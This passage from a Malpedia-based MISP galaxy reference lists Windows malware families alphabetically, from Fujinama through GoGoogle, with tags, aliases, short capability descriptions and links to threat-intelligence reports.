https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/
https://www.secureworks.com/research/threat-profiles/gold-drake
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/
http://www.secureworks.com/research/threat-profiles/gold-drake
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/

win.fujinama

Fujinama is a custom VB info stealer capable to execute custom commands and custom exfiltrations, keylogging and screenshot. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.

The tag is: misp-galaxy:malpedia="win.fujinama"

win.fujinama is also known as:

Table 1849. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fujinama
https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa

FunnySwitch

The tag is: misp-galaxy:malpedia="FunnySwitch"

FunnySwitch is also known as:

Table 1850. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2

FunnyDream

The tag is: misp-galaxy:malpedia="FunnyDream"

FunnyDream is also known as:

Table 1851. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://nao-sec.org/2021/01/royal-road-redive.html
https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf
https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager

Furtim

The tag is: misp-galaxy:malpedia="Furtim"

Furtim is also known as:

Table 1852. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim
https://sentinelone.com/blogs/sfg-furtims-parent/

FuxSocy

FuxSocy has some similarities to win.cerber but is tracked as its own family for now.

The tag is: misp-galaxy:malpedia="FuxSocy"

FuxSocy is also known as:

Table 1853. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy
http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html
https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/

Gacrux

The tag is: misp-galaxy:malpedia="Gacrux"

Gacrux is also known as:

Table 1854. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux
https://krabsonsecurity.com/2020/10/24/gacrux-a-basic-c-malware-with-a-custom-pe-loader/

GalaxyLoader

GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.

It seems to make use of iplogger.com for tracking. It employed WMI to check the system for - IWbemServices::ExecQuery - SELECT * FROM Win32_Processor - IWbemServices::ExecQuery - select * from Win32_VideoController - IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct

The tag is: misp-galaxy:malpedia="GalaxyLoader"

GalaxyLoader is also known as:

Table 1855. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader

gamapos

The tag is: misp-galaxy:malpedia="gamapos"

gamapos is also known as:

pios

Table 1856. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos
http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf

Gameover DGA

The tag is: misp-galaxy:malpedia="Gameover DGA"

Gameover DGA is also known as:

Table 1857. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga

Gameover P2P

Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.

The tag is: misp-galaxy:malpedia="Gameover P2P"

Gameover P2P is also known as:

GOZ
Mapp
ZeuS P2P

Table 1858. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p
https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf
http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf
https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf
https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state
https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group
https://www.wired.com/2017/03/russian-hacker-spy-botnet/
https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/
https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware
https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware
https://www.wired.com/?p=2171700
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.lawfareblog.com/what-point-these-nation-state-indictments

Gamotrol

The tag is: misp-galaxy:malpedia="Gamotrol"

Gamotrol is also known as:

Table 1859. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol

Gandcrab

GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.

In a surprising announcement on May 31, 2019, the GandCrab’s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.

The tag is: misp-galaxy:malpedia="Gandcrab"

Gandcrab is also known as:

GrandCrab

Table 1860. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab
https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/
https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/
https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/
https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/
https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom
https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html
https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/
https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/
https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/
https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/
http://www.secureworks.com/research/threat-profiles/gold-garden
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/
https://isc.sans.edu/diary/23417
https://www.secureworks.com/research/threat-profiles/gold-garden
https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights
https://unit42.paloaltonetworks.com/revil-threat-actors/
https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/
https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
http://asec.ahnlab.com/1145
https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html
https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://vimeo.com/449849549
https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf
https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/
https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/
https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

Gasket

A backdoor used by Mespinoza ransomware gang to maintain access to a compromised network.

The tag is: misp-galaxy:malpedia="Gasket"

Gasket is also known as:

Table 1861. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gasket
https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/

Gaudox

Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).

The tag is: misp-galaxy:malpedia="Gaudox"

Gaudox is also known as:

Table 1862. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox
http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html

Gauss

The tag is: misp-galaxy:malpedia="Gauss"

Gauss is also known as:

Table 1863. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss
http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html

Gazer

The tag is: misp-galaxy:malpedia="Gazer"

Gazer is also known as:

WhiteBear

Table 1864. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer
https://securelist.com/introducing-whitebear/81638/
https://www.youtube.com/watch?v=Pvzhtjl86wc
https://securelist.com/shedding-skin-turlas-fresh-faces/88069/
https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/
https://github.com/eset/malware-ioc/tree/master/turla
https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/
https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf

GCleaner

The tag is: misp-galaxy:malpedia="GCleaner"

GCleaner is also known as:

Table 1865. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner
https://bazaar.abuse.ch/browse/signature/GCleaner/

gcman

The tag is: misp-galaxy:malpedia="gcman"

gcman is also known as:

Table 1866. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman
https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/

GearInformer

The tag is: misp-galaxy:malpedia="GearInformer"

GearInformer is also known as:

Table 1867. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer
https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html

GEARSHIFT

According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.

The tag is: misp-galaxy:malpedia="GEARSHIFT"

GEARSHIFT is also known as:

Table 1868. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift
https://content.fireeye.com/apt-41/rpt-apt41/

GEMCUTTER

According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key. GEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn’t exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.

The tag is: misp-galaxy:malpedia="GEMCUTTER"

GEMCUTTER is also known as:

Table 1869. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Get2

The tag is: misp-galaxy:malpedia="Get2"

Get2 is also known as:

FRIENDSPEAK
GetandGo

Table 1870. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.get2
https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824
https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546
https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md
https://github.com/Tera0017/TAFOF-Unpacker
https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/
https://intel471.com/blog/ta505-get2-loader-malware-december-2020/
https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/
https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104
https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader
https://www.goggleheadedhacker.com/blog/post/13
https://www.secureworks.com/research/threat-profiles/gold-tahoe
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

GetMail

The tag is: misp-galaxy:malpedia="GetMail"

GetMail is also known as:

Table 1871. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

GetMyPass

The tag is: misp-galaxy:malpedia="GetMyPass"

GetMyPass is also known as:

getmypos

Table 1872. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass
https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/
https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html
https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware

get_pwd

The tag is: misp-galaxy:malpedia="get_pwd"

get_pwd is also known as:

Table 1873. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.get_pwd
https://ihonker.org/thread-1504-1-1.html

Gh0stTimes

The tag is: misp-galaxy:malpedia="Gh0stTimes"

Gh0stTimes is also known as:

Table 1874. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes
https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html

Ghole

The tag is: misp-galaxy:malpedia="Ghole"

Ghole is also known as:

CoreImpact (Modified)
Gholee

Table 1875. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole
https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/
http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf

GhostEmperor

The tag is: misp-galaxy:malpedia="GhostEmperor"

GhostEmperor is also known as:

Table 1876. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor
https://www.kaspersky.com/about/press-releases/2021_ghostemperor-chinese-speaking-apt-targets-high-profile-victims-using-unknown-rootkit
https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/

Gh0stnet

The tag is: misp-galaxy:malpedia="Gh0stnet"

Gh0stnet is also known as:

Remosh

Table 1877. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet
https://en.wikipedia.org/wiki/GhostNet
https://www.nartv.org/2019/03/28/10-years-since-ghostnet/
http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html

GhostAdmin

The tag is: misp-galaxy:malpedia="GhostAdmin"

GhostAdmin is also known as:

Ghost iBot

Table 1878. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin
https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/
https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html

Ghost RAT

The tag is: misp-galaxy:malpedia="Ghost RAT"

Ghost RAT is also known as:

Farfli
Gh0st RAT
PCRat

Table 1879. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat
https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf
https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report
https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf
https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack
https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/
http://www.hexblog.com/?p=1248
http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf
https://www.intezer.com/blog-chinaz-relations/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/
https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html
http://www.nartv.org/mirror/ghostnet.pdf
https://www.secureworks.com/research/threat-profiles/bronze-fleetwood
https://blog.cylance.com/the-ghost-dragon
https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41
https://s.tencent.com/research/report/836.html
https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/
https://blog.talosintelligence.com/2019/09/panda-evolution.html
https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/
https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf
https://www.secureworks.com/research/threat-profiles/bronze-globe
https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new
https://www.datanet.co.kr/news/articleView.html?idxno=133346
https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/
https://www.secureworks.com/research/threat-profiles/bronze-edison
https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf
https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox
http://www.malware-traffic-analysis.net/2018/01/04/index.html
https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/
https://www.secureworks.com/research/threat-profiles/bronze-union
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://risky.biz/whatiswinnti/
https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html
https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html
https://hackcon.org/uploads/327/05%20-%20Kwak.pdf
https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/
https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

Gibberish

Ransomware.

The tag is: misp-galaxy:malpedia="Gibberish"

Gibberish is also known as:

Table 1880. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish
https://id-ransomware.blogspot.com/2020/02/gibberish-ransomware.html

Giffy

The tag is: misp-galaxy:malpedia="Giffy"

Giffy is also known as:

Table 1881. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.giffy
https://vx-underground.org/archive/APTs/2016/2016.09.06/Buckeye.pdf

Ginwui

The tag is: misp-galaxy:malpedia="Ginwui"

Ginwui is also known as:

Table 1882. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ginwui
https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Glasses

The tag is: misp-galaxy:malpedia="Glasses"

Glasses is also known as:

Wordpress Bruteforcer

Table 1883. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses

GlassRAT

The tag is: misp-galaxy:malpedia="GlassRAT"

GlassRAT is also known as:

Table 1884. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat
https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat

GlitchPOS

The tag is: misp-galaxy:malpedia="GlitchPOS"

GlitchPOS is also known as:

Table 1885. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos
https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html

GlobeImposter

The tag is: misp-galaxy:malpedia="GlobeImposter"

GlobeImposter is also known as:

Table 1886. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter
https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/
https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run
https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://isc.sans.edu/diary/23417
https://www.secureworks.com/research/threat-profiles/gold-swathmore
https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://blog.ensilo.com/globeimposter-ransomware-technical
https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet

Globe

The tag is: misp-galaxy:malpedia="Globe"

Globe is also known as:

Table 1887. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom

GlooxMail

The tag is: misp-galaxy:malpedia="GlooxMail"

GlooxMail is also known as:

Table 1888. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

Glupteba

The tag is: misp-galaxy:malpedia="Glupteba"

Glupteba is also known as:

Table 1889. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf
https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728
https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign
http://resources.infosecinstitute.com/tdss4-part-1/
https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451
https://habr.com/ru/company/solarsecurity/blog/578900/
https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/
https://labs.k7computing.com/?p=22319
https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html
https://community.riskiq.com/article/2a36a7d2/description
https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/
https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/
https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/

GoBotKR

The tag is: misp-galaxy:malpedia="GoBotKR"

GoBotKR is also known as:

Table 1890. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gobotkr
https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

goCryptoLocker

The tag is: misp-galaxy:malpedia="goCryptoLocker"

goCryptoLocker is also known as:

Table 1891. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gocryptolocker
https://id-ransomware.blogspot.com/2020/04/gocryptolocker-ransomware.html
https://twitter.com/GrujaRS/status/1254657823478353920
https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go

Godlike12

The tag is: misp-galaxy:malpedia="Godlike12"

Godlike12 is also known as:

GOSLU

Table 1892. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12
https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/
https://securelist.com/apt-trends-report-q2-2020/97937/
https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/

goDoH

Proof of concept for data exfiltration via DoH, written in Go.

The tag is: misp-galaxy:malpedia="goDoH"

goDoH is also known as:

Table 1893. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh
https://sensepost.com/blog/2018/waiting-for-godoh/
https://github.com/sensepost/goDoH

Godzilla Loader

The tag is: misp-galaxy:malpedia="Godzilla Loader"

Godzilla Loader is also known as:

Table 1894. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader
https://research.checkpoint.com/godzilla-loader-and-the-long-tail-of-malware/

Goggles

The tag is: misp-galaxy:malpedia="Goggles"

Goggles is also known as:

Table 1895. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

GoGoogle

The tag is: misp-galaxy:malpedia="GoGoogle"

